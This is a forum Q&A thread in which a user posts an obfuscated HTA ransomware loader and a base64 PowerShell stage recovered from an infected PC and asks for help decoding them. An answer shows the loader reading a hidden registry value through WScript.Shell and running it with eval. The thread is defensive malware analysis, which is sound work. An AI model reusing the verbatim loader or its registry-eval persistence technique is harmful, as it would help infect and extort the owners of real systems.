# HTA file with infection code. It is encoded with HEX and other means

Tags: javascript, hta, virus

This file was found on an infected system.  It has the registry entry found on the system that was calling offsite malicious websites for displaying the start of ransomware infection.  I am trying to decode it so I can find the core infected file.  It I believe is a service.

I have tried to decode some of the HEX code (\x66) and such, but everything goes into a variable, and it looks like some variable commands are changing the input, further masking what the output would be.  I am not familiar with JS enough to know what is happening, but it is really interesting.

This was the BASE64 code after a powershell command being called by an unknown source of my search:

```
JAB7AHIAYABlAGcAfQA9ACcASABLAEwATQAnADsAJAB7AFIARQBnAHAAYABBAGAAVABoAH0APQAnADcAcwBQAEYAUAA3AEIANwBHAEYAJwA7ACQAewBSAGAAZQBnAGAAawBlAHkAbgBhAE0ARQB9AD0AJwB0ADMAVgBWAG4ATgB0ADcAZQBVACcAOwAkAHsAcABgAEEAUgBhAG0AfQA9ACcAbABJAE0AbgB0AEMAUwA4AGwATAAnADsAJAB7AEYAdQBMAGAAbAByAGAARQBHAH0APQAkAHsAcgBgAEUARwB9ACsAKAAoACgAIgB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADAAfQAiAC0AZgAnAGYAWABMACcALAAnADoAZgAnACwAJwBTAG8AZgB0AHcAJwAsACcAWABMACcALAAnAGEAcgBlACcAKQApAC4AIgByAGAARQBwAGwAYABBAEMARQAiACgAKABbAEMASABBAFIAXQAxADAAMgArAFsAQwBIAEEAUgBdADgAOAArAFsAQwBIAEEAUgBdADcANgApACwAWwBTAHQAcgBJAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKwAkAHsAcgBgAEUARwBwAGAAQQBUAEgAfQA7ACQAewBFAGAAeABgAHAAUgBFAGAAcwBTAEkATwBuAH0APQAoACYAKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwBHACcALAAnAHIAbwBwACcALAAnAGUAcgB0AHkAJwAsACcAZQB0AC0ASQB0AGUAbQBQACcAKQAgACQAewBmAGAAVQBgAEwATAByAGUAZwB9ACkALgAkAHsAUABhAFIAYABBAE0AfQA7AC4AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAaQAnACwAJwBlAHgAJwApACgAJAB7AGUAWABgAHAAUgBlAHMAcwBgAGkAbwBOAH0AKQA=
```

Once decoded it vaguely shows the registry entry created.

This was the file on the system. I have added spaces/LF for easier viewing.

```
<HTA:APPLICATION ID="xAIAv5nyFFnT" 
APPLICATIONNAME="qzEserCEK" 
SCROLL="auto" 
SINGLEINSTANCE="yes" 
CAPTION="no" 
BORDER="none" 
SHOWINTASKBAR="no" 
INNERBORDER="no" 
WINDOWSTATE="minimize">

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>tzEg1b54H</title><script>

jsibjKf9='HKLM\\Software\\Wow6432Node\\';

A41IZs4sH=jsibjKf9+'7sPFP7B7GF'+'\\'+'WVSMOZtXy8';

fVTKUU4Z='h'+'\x66'+'iei7'+['swY','iueh','U9Q'][1];

uAlUHoEI4='\x66';

mUrRZBlw=['hon','f','Ylz'][1];

PBMSNkV=uAlUHoEI4+mUrRZBlw;

sJpxcf4ckU=PBMSNkV+mUrRZBlw;

CAxiNPV=['dt9','q9','Ig98'][1]+['oT8N','JMk','bwkq','y7t6'][3]+sJpxcf4ckU;

bgWd1m='ds'+'b'+['LgE','A6nX','us','\x4e\x35\x63\x6a'][2]+CAxiNPV;

TvfsJFqm=['df','E_oB','JpG','Q21T'][0]+['jc3','UVF','vQUq','s'][3]+sJpxcf4ckU+'8'+'y'+'n'+'7';

fNpaIhi='\x64'+'f'+'\x68'+['7e','_DW','f_kE'][0]+bgWd1m+['fcP','QFt','hu'][2];

mq67_LC_Y=['ci5v','eh','Bv8'][1]+uAlUHoEI4+['wORH','GHpQ','qYsT','if'][3]+fNpaIhi+['uw','o6n','YqFF','eQTd'][0];

try{throw new Error(['qrau','zWt','hSs','.'][3]);
}
catch(x9y094wnx2)
{fVTKUU4Z=x9y094wnx2[['mAW','pAwK','nGD','mess'][3]+['qJM','age','bA_'][1]];
}
try
{throw new Error(['wcM5','EK4T','s','kwv6'][2]);
}
catch(MSFbXy)
{mUrRZBlw=MSFbXy[['mes','xto','qSY'][0]+['ZL1','N1b','sag'][2]+['ofr7','e','n94E','bfw'][1]];
}
try
{throw new Error('l');
}
catch(mo_NzYG)
{PBMSNkV=mo_NzYG[['yKAP','mess','Vx3Y'][1]+['age','\x6b\x33\x46','HstV','Sy2S'][0]];
}
try
{throw new Error(['zF62','c','Jwd','ILd'][1]);
}
catch(olcqTW)
{sJpxcf4ckU=olcqTW['\x6d'+'es'+['sag','ThL','ba8D'][0]+'e'];
}
try
{throw new Error('e');
}
catch(UCk3C3)
{uAlUHoEI4=UCk3C3[['lsiE','tEV','NpZQ','mess'][3]+['Gdg','MR0D','age'][2]];
}
try
{throw new Error('t');
}
catch(d8hyM21)
{CAxiNPV=d8hyM21['mess'+['ag','rrc','msGL'][0]+'e'];
}
try
{throw new Error(['i','idyq','s23J','\x77\x67\x38'][0]);
}
catch(FH2wspm)
{bgWd1m=FH2wspm['m'+'es'+['JXZc','\x73\x61\x67','rUs','fCW'][1]+['MAU','e','qM58'][1]];
}
try
{throw new Error(['Dwfy','v','IDK'][1]);
}
catch(nWUuLDh)
{TvfsJFqm=nWUuLDh[['pYF','\x6a\x73\x30\x4b','mes','wO2'][2]+['rNO9','giiJ','sage'][2]];
}
try
{throw new Error(['iy5Z','cE7','t'][2]);
}
catch(lJtpvPh9X)
{CAxiNPV=lJtpvPh9X[['me','NTrH','J4ju'][0]+'\x73\x73'+'a'+['XbGB','\x57\x72\x32','ge'][2]];
}
try
{throw new Error('\x53');
}
catch(hWWGLap){fNpaIhi=hWWGLap[['\x63\x39\x44\x43','xQk','mes','wM2c'][2]+['crOJ','bqZ','sag'][2]+['ngu','e','qjMR'][1]];
}
try
{throw new Error('\x52');
}
catch(WH4uWp9)
{mq67_LC_Y=WH4uWp9['\x6d\x65'+'ss'+'a'+'g'+'\x65'];
}
NWGvw4i=sJpxcf4ckU+'o'+['v2rO','\x6e','hye'][1]+mUrRZBlw+['Gbi','fxP','t'][2]+['l_Xf','fw54','r'][2]+['VMW1','UTu','u'][2]+sJpxcf4ckU+['t','BY9z','viM'][0]+'o'+['onm_','ZnJ','r'][2];
R18YNC6JjX=uAlUHoEI4+TvfsJFqm+'a'+PBMSNkV+['("','zQyX','RCL','Qi9'][0]+'X'+'Y1'+'J'+'_'+'\x77\x3d'+['eeQ','UYMS','Fi4','th'][3]+bgWd1m+mUrRZBlw+['\x5a\x66\x36','ykW',';
"','_of'][2]+')';

EQIJC3=['JJgq','PRb','Vlpy','W'][3]+fNpaIhi+sJpxcf4ckU+['r','\x57\x6c\x79','DWsl','df2'][0]+bgWd1m+['\x75\x36\x6b\x34','QW3','\x70\x74','\x77\x4f\x62\x4d'][2]+fVTKUU4Z+fNpaIhi+'\x68'+uAlUHoEI4+PBMSNkV+PBMSNkV;

dMVY8_=['jaqb','XDga','VJB1','A'][3]+sJpxcf4ckU+['vIr','YrFz','t','QoUm'][2]+bgWd1m+TvfsJFqm+uAlUHoEI4+['s16r','RuU','XObj'][2]+uAlUHoEI4+sJpxcf4ckU+'t';

xx3EjCVo31=mq67_LC_Y+uAlUHoEI4+['\x67','RQF','DXk','\x6c\x76\x64'][0]+mq67_LC_Y+uAlUHoEI4+['OmuP','ad','CCx'][1];

VLGRE1kdNk=uAlUHoEI4+TvfsJFqm+'a'+PBMSNkV;

B7EpHr=sJpxcf4ckU+PBMSNkV+['o','\x43\x78\x68','F9g'][0]+mUrRZBlw+uAlUHoEI4;

kR4Di8izVe=PBMSNkV+sJpxcf4ckU+CAxiNPV;

dBdlTCP=kR4Di8izVe[NWGvw4i][NWGvw4i];

_BoofMt4aj=dBdlTCP(R18YNC6JjX)();

try
{KMAswI3=new XY1J_w[dMVY8_](EQIJC3);
}
catch(_0UaAgblja)
{}
try{XY1J_w[VLGRE1kdNk](KMAswI3[xx3EjCVo31](A41IZs4sH));
}
catch(OmTqGis0dj)
{}
XY1J_w[B7EpHr]();

</script></head><body>
mvv7zDBzZULpDtQJ7JJkXKv5Wo2XP9vrVzzzycCz06nQGZEdFQXj_rbFLgwjIy

</body>
```

Answer (score 2):

The payload essentially executes the following

```
try {
  wshell = new ActiveXObject('WScript.Shell');
  eval(wshell.RegRead('HKLM\\Software\\Wow6432Node\\7sPFP7B7GF\\WVSMOZtXy8'));
} catch (error) {}

window.close();
```

I imagine you'll find much more obfuscated JavaScript code in that registry entry.

Good luck.

Comment: @Zlatko the payload is already being executed within an [HTA](https://en.wikipedia.org/wiki/HTML_Application) so asking what browsers would fail is irrelevant

Comment: Oh, I understand, glazed over that part as I was not aware that's the name for the thing

Comment: Thank you!  This helps.  I should have saved the registry entry, however I killed it out of frustration after finding it.

Comment: @PhoenixDesert you still haven't solved the underlying problem. Your system is still _vulnerable_ and you need to figure out how this malicious code made it into your system in the first place.

Comment: I would agree, the system did not have some basic protections active, which I constantly encourage home users to do.  You can lead a horse to water...  I was intrigued by the new way of hiding the infection with multiple layers of computer readable code, but for a human, much harder.  Again I appreciate the translation.  I felt that was what it was doing, but I wanted to make sure there was not a back door.  (I will still recommend the system be fully restored from factory disks)  On a side note, the system did have the MicTray64 infection. It may have been a point of entry.